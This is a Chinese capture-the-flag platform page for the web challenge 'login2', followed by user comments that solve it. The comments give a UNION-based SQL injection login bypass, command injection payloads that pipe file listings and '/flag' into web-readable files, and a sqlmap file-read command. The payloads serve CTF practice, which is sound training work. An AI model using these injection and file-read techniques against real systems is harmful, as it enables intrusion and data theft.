login2WEB 未解决

分数: 40 金币: 6
题目作者: 未知
一  血: ShawRoot
一血奖励: 5金币
解  决: 3074
提  示: 命令执行
描  述:
login2
评论
厌弃. 17天前

实在没思路可以看一下https://www.yuque.com/g/zhubingbing-mwvgf/ushfpr/ntu40vr3d98gibcu/collaborator/join?token=Y99THaE7V8rENfAC&source=doc_collaborator# 《login2》

回复 0

西红柿dun牛腩 26天前

有个问题啊,怎么知道flag是在/flag路径下的

回复 0
123佳 25天前

登录成功之后,输入框输入 任意字符 | ls / > 1.txt ,访问1.txt能看到文件名

回复 1

我的刀盾 1月前

不只是考察命令执行漏洞,还考察了md5的严格相等sql注入,前面使用sqlmap扫,用时间盲注但扫出来的数据是空的,看评论注意到响应报文有个tip,解码发现是个php代码,提示使用MD5”===“匹配输入的密码,绕过后才是命令执行,但不回显。输入0,列出所有进程,尝试ls -la / > /var/www/html/root.txt,然后url访问发现可以访问,解决了。

回复 0

蟹不揉 4月前

用sqlmap扫一遍发现有SQL注入漏洞,权限足够高直接sqlmap -r post.txt --batch --file-read=/flag

回复 0

qq1002517 7月前

flag{******}

回复 0

5883120xly 10月前

username= ' UNION SELECT '任意用户名', 'fae0b27c451c728867a567e8c1bb4e53' -- password=666 进入命令执行界面输入 666 | cat /flag >2.txt 访问http://117.72.52.127:14324/2.txt即可

回复 2

你文博哥哥 1年前

首先爆破,没出来,sqlmap扫了,账号密码为空,丫的,没法去找有用信息,源码,请求头,都没,最后在返回包找到了tip,解码,得到注入点,username输入admin'union select 1,md5(123)#&password(123),得到监控系统,然后看见输入框,想到了rce,然后尝试输入1,然后输入ls /,没回显,被过滤,后面利用tee命令,将查找写入新文件,访问即可

回复 1

一个姓⎝李⎠的师傅~ 1年前

做了 3 个小时,完整记录了自己的 25 个步骤,sqlmap 省略了因为没有可用信息! 来看看吧,肯定会对你有帮助,联合注入的发现,命令执行写入文件绕过没有网页回显命令内容的办法,包括路径的讲解: https://www.yuque.com/u21437924/ap9vtm/gqkc3dcfmfpe5p85?singleDoc#zIr77

回复 21
告别の记忆 29天前

感谢分享,还是这个讲的清楚

回复 0

꧁༺༽༾ཊCCཏ༿༼༻꧂ 1年前

没难度

回复 1

六分之杰 1年前

https://zhuanlan.zhihu.com/p/7343164566

回复 0

WriteUp

image
harry

6 金币

评分(14)

解题动态

6ufui 攻破了该题 1小时前
tabwux 攻破了该题 1天前
aiheyenai 攻破了该题 2天前
小白d 攻破了该题 2天前
xyqt 攻破了该题 3天前
zrlht 攻破了该题 3天前
低调申 攻破了该题 3天前
bisheng 攻破了该题 4天前
mmbsklm 攻破了该题 5天前
dawndawnz 攻破了该题 6天前
jwleft 攻破了该题 6天前
willow 攻破了该题 6天前
LPLa3er 攻破了该题 8天前
关山月 攻破了该题 8天前
white1build 攻破了该题 8天前
HXY111 攻破了该题 10天前
浮舟 攻破了该题 13天前
whshkdh 攻破了该题 13天前
i8vkmmju 攻破了该题 13天前
ijoaole 攻破了该题 13天前
问题反馈